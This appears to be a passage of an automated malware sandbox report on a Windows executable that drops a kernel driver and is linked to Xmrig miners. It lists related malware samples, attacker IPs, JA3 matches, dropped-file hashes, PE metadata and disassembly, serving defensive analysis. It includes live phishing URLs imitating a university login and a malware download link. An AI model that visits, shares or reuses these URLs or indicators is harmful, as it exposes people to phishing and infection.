	Xmz1XDgtah.exe	Get hash	malicious	DCRat	Browse	145.14.145.191
	4fjy5gB1w6.elf	Get hash	malicious	Mirai	Browse	153.93.11.255
	msedge_elf.dll	Get hash	malicious	Unknown	Browse	145.14.144.129
	claro.596166.msi	Get hash	malicious	Unknown	Browse	145.14.144.17
	xcBienFkvE.elf	Get hash	malicious	Mirai	Browse	153.93.242.119
	DaN5NG0bt8.elf	Get hash	malicious	Mirai	Browse	153.93.154.136
	czfsby2aHY.exe	Get hash	malicious	AZORult	Browse	145.14.144.104
	SecuriteInfo.com.Trojan.KillProc2.16811.26778.27406.exe	Get hash	malicious	Unknown	Browse	145.14.145.70
	SecuriteInfo.com.Trojan.KillProc2.16811.26778.27406.exe	Get hash	malicious	Unknown	Browse	145.14.144.29
OnlineSASFR	PHHOjspjmp.exe	Get hash	malicious	CMSBrute	Browse	51.15.246.170
	Isass.exe	Get hash	malicious	Unknown	Browse	51.158.204.9
	Isass.exe	Get hash	malicious	Unknown	Browse	51.158.204.9
	https://univ-paris13-4.laviewddns.com/login.php?wa=wsignin1.0&client_id=fe9c55ad-8a94-46b2-a3c3-816799478139	Get hash	malicious	Unknown	Browse	62.4.16.115
	https://univ-paris13-3.laviewddns.com/login.php?wa=wsignin1.0&client_id=fe9c55ad-8a94-46b2-a3c3-816799478139	Get hash	malicious	Unknown	Browse	62.4.16.115
	https://univ-paris13.laviewddns.com/login.php?wa=wsignin1.0&client_id=fe9c55ad-8a94-46b2-a3c3-816799478139	Get hash	malicious	Unknown	Browse	62.4.16.115
	SecuriteInfo.com.Trojan.GenericKD.72238195.888.8814.exe	Get hash	malicious	Unknown	Browse	51.15.67.108
	SecuriteInfo.com.Trojan.GenericKD.72238195.888.8814.exe	Get hash	malicious	Unknown	Browse	51.15.67.108
	dI3tFWyJ6d.elf	Get hash	malicious	Mirai	Browse	51.159.169.211
	ayejQ3Qo2k.elf	Get hash	malicious	Mirai	Browse	51.158.232.118
AWEXUS	http://xred.site50.net/syn/SSLLibrary.dll	Get hash	malicious	Unknown	Browse	153.92.0.100
	Xmz1XDgtah.exe	Get hash	malicious	DCRat	Browse	145.14.145.191
	4fjy5gB1w6.elf	Get hash	malicious	Mirai	Browse	153.93.11.255
	msedge_elf.dll	Get hash	malicious	Unknown	Browse	145.14.144.129
	claro.596166.msi	Get hash	malicious	Unknown	Browse	145.14.144.17
	xcBienFkvE.elf	Get hash	malicious	Mirai	Browse	153.93.242.119
	DaN5NG0bt8.elf	Get hash	malicious	Mirai	Browse	153.93.154.136
	czfsby2aHY.exe	Get hash	malicious	AZORult	Browse	145.14.144.104
	SecuriteInfo.com.Trojan.KillProc2.16811.26778.27406.exe	Get hash	malicious	Unknown	Browse	145.14.145.70
	SecuriteInfo.com.Trojan.KillProc2.16811.26778.27406.exe	Get hash	malicious	Unknown	Browse	145.14.144.29

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
28a2c9bd18a11de089ef85a160da29e4	https://runrun.it/share/form/0GZMCgHSxRh4PBOM	Get hash	malicious	HTMLPhisher	Browse	13.85.23.86 40.127.169.103
	Dragons Dogma 2 v1.0 Plus 36 Trainer.exe	Get hash	malicious	Unknown	Browse	13.85.23.86 40.127.169.103
	http://421225.tctm.xyz	Get hash	malicious	Unknown	Browse	13.85.23.86 40.127.169.103
	InmateExport.exe	Get hash	malicious	Unknown	Browse	13.85.23.86 40.127.169.103
	http://www.technology-trend.com	Get hash	malicious	Unknown	Browse	13.85.23.86 40.127.169.103
	https://gelw.nalverd.com/AvGEoxV/	Get hash	malicious	HTMLPhisher	Browse	13.85.23.86 40.127.169.103
	Packing List PDF.bat.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	13.85.23.86 40.127.169.103
	ePI4igo4y1.exe	Get hash	malicious	AsyncRAT	Browse	13.85.23.86 40.127.169.103
	POattach.html	Get hash	malicious	HTMLPhisher	Browse	13.85.23.86 40.127.169.103
	http://www.ensp.fiocruz.br/portal-ensp/entrevista/counter.php?content=http://owens-minor.com&contentid=32190&link=https://nabbeton.com/!	Get hash	malicious	Unknown	Browse	13.85.23.86 40.127.169.103

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Windows\Temp\zadejssjsckf.sys	SecuriteInfo.com.Win64.TrojanX-gen.22735.27744.exe	Get hash	malicious	Xmrig	Browse
	SecuriteInfo.com.Win32.PWSX-gen.900.19500.exe	Get hash	malicious	RedLine, Xmrig	Browse
	nissrv.exe	Get hash	malicious	Xmrig	Browse
	nissrv.exe	Get hash	malicious	Xmrig	Browse
	Wave32bit.exe	Get hash	malicious	Unknown	Browse
	SecuriteInfo.com.Variant.Marsilia.120335.22241.7512.exe	Get hash	malicious	Moneroocean Miner, Xmrig	Browse
	nissrv.exe	Get hash	malicious	Xmrig	Browse
	DeltaX.exe	Get hash	malicious	Xmrig	Browse
	SecuriteInfo.com.Win32.PWSX-gen.22336.13850.exe	Get hash	malicious	Vidar	Browse
	Arceus.exe	Get hash	malicious	Xmrig	Browse

Created / dropped Files

C:\ProgramData\Microsoft\Network\Downloader\edb.log

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	1310720
Entropy (8bit):	1.3315551444497749
Encrypted:	false
SSDEEP:	3072:5JCnRjDxImmaooCEYhlOe2Pp4mH45l6MFXDaFXpVv1L0Inc4lfEnogVsiJKrvrv:KooCEYhgYEL0In
MD5:	F7A91F1456B70427BC97DD25F133E8C2
SHA1:	1384E19ED695DB0328B8C741019CDB83BBD61FBA
SHA-256:	C46E0293E1D06C37A88CEAE32749078A042F19847F55B23C77A3AD26CE693435
SHA-512:	71EA3360707335872BF205C88FF367901E9DBE6ED5BA5BBFC5263AC1DF13C11D21FA04E6050EB9CBF7767D1157655CA13D070D425FEA6D2D648A86712AB89978
Malicious:	false
Preview:	z3..........@..@.;...{..................<...D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@..........................................#.................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Network\Downloader\qmgr.db

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	Extensible storage engine DataBase, version 0x620, checksum 0x78e0b33c, page size 16384, DirtyShutdown, Windows version 10.0
Category:	dropped
Size (bytes):	1310720
Entropy (8bit):	0.42217467398451
Encrypted:	false
SSDEEP:	1536:5SB2ESB2SSjlK/dvmdMrSU0OrsJzvdYkr3g16T2UPkLk+kTX/Iw4KKCzAkUk1kI6:5aza/vMUM2Uvz7DO
MD5:	E3C6DC0C451E598B56D7AC997FF072EC
SHA1:	C45D8A1E563B7895674DCEE3E899816BEECA083C
SHA-256:	2159ACCFA7FEDD796B3BCD1494BF3A4092AFE5ECA3B93DD695FB743E219AD884
SHA-512:	C5069B25BCB12515D75E86012D9E20602AEA698F790A15A77F9078E6A8E6C0458FBFAFACFCC1F8B2A406742EE9A3D585AC37C214B807CA054CE4BBC8EF0745F6
Malicious:	false
Preview:	x.<... .......A.......X\...;...{......................0.!..........{A..0...\|].h.#.........................D./..;...{..........................................................................................................eJ......n....@...................................................................................................... ........;...{...............................................................................................................................................................................................2...{..................................)7!..0...\|]..................!...0...\|]..........................#......h.#.....................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	16384
Entropy (8bit):	0.07682447733882056
Encrypted:	false
SSDEEP:	3:Ull8YeavGajn13a/hjrIBallcVO/lnlZMxZNQl:Ul6zHa53qlrI0Oewk
MD5:	110380A1A1FD25E5ADAA56D9BD69A79F
SHA1:	82AE0E92647A39398B852FE29837D7061060236A
SHA-256:	53B04737F2FE4BEE6022C5FBB9E754492697EC67D0E7DC81C55E5D81137DF92F
SHA-512:	4DE81804B1F22965123CBCF27CDAD5B3EF8AD35B319CA017AB7122D3A3992EA3AD9AADC636829C90A18440B03BEC2C86982D9898066481418A25D2BC4EA9941A
Malicious:	false
Preview:	+b;......................................;...{...0...\|]......{A..............{A......{A..........{A].................!...0...\|].........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\xdftdueakusz\vefyedjsvjut.exe

Download File

Process:	C:\Users\user\Desktop\gq83mrprwy.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	2653184
Entropy (8bit):	6.5408955513016656
Encrypted:	false
SSDEEP:	49152:tq+bulp7HM3wpNbmZTfpuentlEt4TNBKpjQBHYKiLz01AkC:tq+EZHM3AsZfpuulEt4TNBY0BeU1Ak
MD5:	3B43DA1BE0C39802B78F6B2C55C4D7E6
SHA1:	C7735B309F6543439E447DEF8351D7238F7C9D58
SHA-256:	00F5CB420D8CAF253B67E22714104CE1FB2D75341286C6E3FF31F527E7E5F5EB
SHA-512:	8696BCC429CEB8C2A8ACB5E4C4D1F963EB5E6DA41B9EDE3365D9046CBC287E97809545E3204B714591111AC77B4D653ED3849FE61A67A8645DDCF1B5A067BC5A
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 63% Antivirus: Virustotal, Detection: 58%, Browse
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...P.+f.........."......\|....'.....@..........@..............................(...........`....................................................<.............(...............(.x...............................(.......8...........`...X............................text....z.......\|.................. ..`.rdata..............................@..@.data.....'.......'.................@....pdata........(......t(.............@..@.00cfg........(......v(.............@..@.tls..........(......x(.............@....reloc..x.....(......z(.............@..B................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	64
Entropy (8bit):	1.1940658735648508
Encrypted:	false
SSDEEP:	3:Nlllultnxj:NllU
MD5:	F93358E626551B46E6ED5A0A9D29BD51
SHA1:	9AECA90CCBFD1BEC2649D66DF8EBE64C13BACF03
SHA-256:	0347D1DE5FEA380ADFD61737ECD6068CB69FC466AC9C77F3056275D5FCAFDC0D
SHA-512:	D609B72F20BF726FD14D3F2EE91CCFB2A281FAD6BC88C083BFF7FCD177D2E59613E7E4E086DB73037E2B0B8702007C8F7524259D109AF64942F3E60BFCC49853
Malicious:	false
Preview:	@...e................................................@..........

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3jmoybgc.rvl.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_skicw24l.u32.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_uj0bgugp.vym.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wty1ecep.ckh.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	55
Entropy (8bit):	4.306461250274409
Encrypted:	false
SSDEEP:	3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
MD5:	DCA83F08D448911A14C22EBCACC5AD57
SHA1:	91270525521B7FE0D986DB19747F47D34B6318AD
SHA-256:	2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
SHA-512:	96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
Malicious:	false
Preview:	{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}

C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	64
Entropy (8bit):	1.1510207563435464
Encrypted:	false
SSDEEP:	3:Nlllulph:NllUp
MD5:	6326A468428FB587CEDFEBBBB1475088
SHA1:	0891D1C8C70198B7017A90BFF18C26CC86EDB06F
SHA-256:	1968A53D7B132CF86C5866C43681DF7F9B57842594D65B63B232E370F6C20962
SHA-512:	9CC56C44135634FA7AECDE5938B62FCFC1C8D9A43EF1BD58C308BF14B23922E6960DAC5BA24618ADD6EFF56F16BC6DF34E37DD8A30413BFC77ABAAA8D361C631
Malicious:	false
Preview:	@...e.................................f..............@..........

C:\Windows\Temp\__PSScriptPolicyTest_5fofh0z1.2mg.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Windows\Temp\__PSScriptPolicyTest_arojeqlb.yfq.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Windows\Temp\__PSScriptPolicyTest_fsjyb1bw.jff.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Windows\Temp\__PSScriptPolicyTest_pyntlic0.hml.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Windows\Temp\zadejssjsckf.sys

Download File

Process:	C:\ProgramData\xdftdueakusz\vefyedjsvjut.exe
File Type:	PE32+ executable (native) x86-64, for MS Windows
Category:	dropped
Size (bytes):	14544
Entropy (8bit):	6.2660301556221185
Encrypted:	false
SSDEEP:	192:nqjKhp+GQvzj3i+5T9oGYJh1wAoxhSF6OOoe068jSJUbueq1H2PIP0:qjKL+v/y+5TWGYOf2OJ06dUb+pQ
MD5:	0C0195C48B6B8582FA6F6373032118DA
SHA1:	D25340AE8E92A6D29F599FEF426A2BC1B5217299
SHA-256:	11BD2C9F9E2397C9A16E0990E4ED2CF0679498FE0FD418A3DFDAC60B5C160EE5
SHA-512:	AB28E99659F219FEC553155A0810DE90F0C5B07DC9B66BDA86D7686499FB0EC5FDDEB7CD7A3C5B77DCCB5E865F2715C2D81F4D40DF4431C92AC7860C7E01720D
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 5% Antivirus: Virustotal, Detection: 3%, Browse
Joe Sandbox View:	Filename: SecuriteInfo.com.Win64.TrojanX-gen.22735.27744.exe, Detection: malicious, Browse Filename: SecuriteInfo.com.Win32.PWSX-gen.900.19500.exe, Detection: malicious, Browse Filename: nissrv.exe, Detection: malicious, Browse Filename: nissrv.exe, Detection: malicious, Browse Filename: Wave32bit.exe, Detection: malicious, Browse Filename: SecuriteInfo.com.Variant.Marsilia.120335.22241.7512.exe, Detection: malicious, Browse Filename: nissrv.exe, Detection: malicious, Browse Filename: DeltaX.exe, Detection: malicious, Browse Filename: SecuriteInfo.com.Win32.PWSX-gen.22336.13850.exe, Detection: malicious, Browse Filename: Arceus.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......5:n.q[..q[..q[..q[..}[..V.{.t[..V.}.p[..V.m.r[..V.q.p[..V.\|.p[..V.x.p[..Richq[..................PE..d....&.H.........."..................P.......................................p..............................................................dP..<....`.......@..`...................p ............................................... ..p............................text............................... ..h.rdata..\|.... ......................@..H.data........0......................@....pdata..`....@......................@..HINIT...."....P...................... ....rsrc........`......................@..B................................................................................................................................................................................................................................................................................

Chrome Cache Entry: 59

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (3299)
Category:	downloaded
Size (bytes):	3304
Entropy (8bit):	5.814015729828141
Encrypted:	false
SSDEEP:	96:e51c1liMH6666C6OoS9TIpErUJbaiNhrfffffX:e1cTjH6666Cno8spEwBaQT
MD5:	9B7E9FE9E2D77C33C9CE32C68DA4BC3B
SHA1:	65B48AE1C5366F630745BE2DF843197BDFFD6FDE
SHA-256:	300322B02D206FDAE57E26C548958A7B4370C93FCB5A799C2AAA44301AC0F974
SHA-512:	E132325B00DD6C4FDA500981D6D629BBC5D9457A50C0AC13FE8859274935EA23502509F8328EEF0E2D893DDBBB7352292340DC391D878E06409D45A5390EBEA8
Malicious:	false
URL:	https://www.google.com/complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw
Preview:	)]}'.["",["final jeopardy april 25","southwest airlines airports","student loans","jackson state coach tomekia reed","blizzard canceled blizzcon","slipknot drummer","slack stewart butterfield","south carolina cicadas"],["","","","","","","",""],[],{"google:clientdata":{"bpc":false,"tlw":false},"google:groupsinfo":"ChgIkk4SEwoRVHJlbmRpbmcgc2VhcmNoZXM\u003d","google:suggestdetail":[{"zl":10002},{"zl":10002},{"zl":10002},{"zl":10002},{"zl":10002},{"zl":10002},{"google:entityinfo":"CgkvbS8wZzhjOWcSIEZvcm1lciBDRU8gb2YgU2xhY2sgVGVjaG5vbG9naWVzMr8NZGF0YTppbWFnZS9qcGVnO2Jhc2U2NCwvOWovNEFBUVNrWkpSZ0FCQVFBQUFRQUJBQUQvMndDRUFBa0dCd2dIQmdrSUJ3Z0tDZ2tMRFJZUERRd01EUnNVRlJBV0lCMGlJaUFkSHg4a0tEUXNKQ1l4Sng4ZkxUMHRNVFUzT2pvNkl5cy9SRDg0UXpRNU9qY0JDZ29LRFF3TkdnOFBHamNsSHlVM056YzNOemMzTnpjM056YzNOemMzTnpjM056YzNOemMzTnpjM056YzNOemMzTnpjM056YzNOemMzTnpjM056YzNOLy9BQUJFSUFFQUFRQU1CSWdBQ0VRRURFUUgveEFBY0FBQUNBZ01CQVFBQUFBQUFBQUFBQUFBRUJRTUdBUUlIQ0FEL3hBQXpFQUFDQVFNQ0F3VUdCUVVBQUFBQUFBQUJBZ01BQkJFRkVpRXhRUVpSW

Static File Info

General

File type:	PE32+ executable (GUI) x86-64, for MS Windows
Entropy (8bit):	6.5408955513016656
TrID:	Win64 Executable GUI (202006/5) 92.65% Win64 Executable (generic) (12005/4) 5.51% Generic Win/DOS Executable (2004/3) 0.92% DOS Executable Generic (2002/1) 0.92% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	gq83mrprwy.exe
File size:	2'653'184 bytes
MD5:	3b43da1be0c39802b78f6b2c55c4d7e6
SHA1:	c7735b309f6543439e447def8351d7238f7c9d58
SHA256:	00f5cb420d8caf253b67e22714104ce1fb2d75341286c6e3ff31f527e7e5f5eb
SHA512:	8696bcc429ceb8c2a8acb5e4c4d1f963eb5e6da41b9ede3365d9046cbc287e97809545e3204b714591111ac77b4d653ed3849fe61a67a8645ddcf1b5a067bc5a
SSDEEP:	49152:tq+bulp7HM3wpNbmZTfpuentlEt4TNBKpjQBHYKiLz01AkC:tq+EZHM3AsZfpuulEt4TNBY0BeU1Ak
TLSH:	CFC533CE9702E6FDD48438F2DC2D4E4F6D3A59801BA164E76FEB41A236909D4B071AD3
File Content Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...P.+f.........."......\|....'.....@..........@..............................(...........`........................................

File Icon


Icon Hash:	90cececece8e8eb0

Static PE Info

General

Entrypoint:	0x140001140
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x140000000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
DLL Characteristics:	HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Time Stamp:	0x662BB150 [Fri Apr 26 13:51:12 2024 UTC]
TLS Callbacks:	0x40001760, 0x1, 0x400017e0, 0x1
CLR (.Net) Version:
OS Version Major:	6
OS Version Minor:	0
File Version Major:	6
File Version Minor:	0
Subsystem Version Major:	6
Subsystem Version Minor:	0
Import Hash:	de41d4e0545d977de6ca665131bb479a

Entrypoint Preview

Instruction
dec eax
sub esp, 28h
dec eax
mov eax, dword ptr [00007ED5h]
mov dword ptr [eax], 00000001h
call 00007F45608D02CFh
nop
nop
nop
dec eax
add esp, 28h
ret
nop
inc ecx
push edi
inc ecx
push esi
push esi
push edi
push ebx
dec eax
sub esp, 20h
dec eax
mov eax, dword ptr [00000030h]
dec eax
mov edi, dword ptr [eax+08h]
dec eax
mov esi, dword ptr [00007EC9h]
xor eax, eax
dec eax
cmpxchg dword ptr [esi], edi
sete bl
je 00007F45608D02F0h
dec eax
cmp edi, eax
je 00007F45608D02EBh
dec esp
mov esi, dword ptr [000096F9h]
nop word ptr [eax+eax+00000000h]
mov ecx, 000003E8h
inc ecx
call esi
xor eax, eax
dec eax
cmpxchg dword ptr [esi], edi
sete bl
je 00007F45608D02C7h
dec eax
cmp edi, eax
jne 00007F45608D02A9h
dec eax
mov edi, dword ptr [00007E90h]
mov eax, dword ptr [edi]
cmp eax, 01h
jne 00007F45608D02CEh
mov ecx, 0000001Fh
call 00007F45608D7974h
jmp 00007F45608D02E9h
cmp dword ptr [edi], 00000000h
je 00007F45608D02CBh
mov byte ptr [00287279h], 00000001h
jmp 00007F45608D02DBh
mov dword ptr [edi], 00000001h
dec eax
mov ecx, dword ptr [00007E7Ah]
dec eax
mov edx, dword ptr [00007E7Bh]
call 00007F45608D796Bh
mov eax, dword ptr [edi]
cmp eax, 01h
jne 00007F45608D02DBh
dec eax
mov ecx, dword ptr [00007E50h]

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xa5c8	0x3c	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x0	0x0
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x28a000	0x180	.pdata
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x28d000	0x78	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x90a0	0x28	.rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x9410	0x138	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0xa760	0x158	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x7a06	0x7c00	9d9f8bb682b937c035f13e96723337ed	False	0.5039692540322581	data	6.13815157151994	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x9000	0x1d10	0x1e00	8a6517b1f17167528235eb97e0671d23	False	0.45625	zlib compressed data	4.651620986057603	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0xb000	0x27e3e0	0x27d600	fb34f235f6c9bf8a8ee5c842ea78ed56	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.pdata	0x28a000	0x180	0x200	48e1e807d559d162f3236974dfb1a03d	False	0.501953125	data	3.122656618370151	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.00cfg	0x28b000	0x10	0x200	b18c7380298e104adf73576fa46bccc1	False	0.04296875	data	0.15127132530476972	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
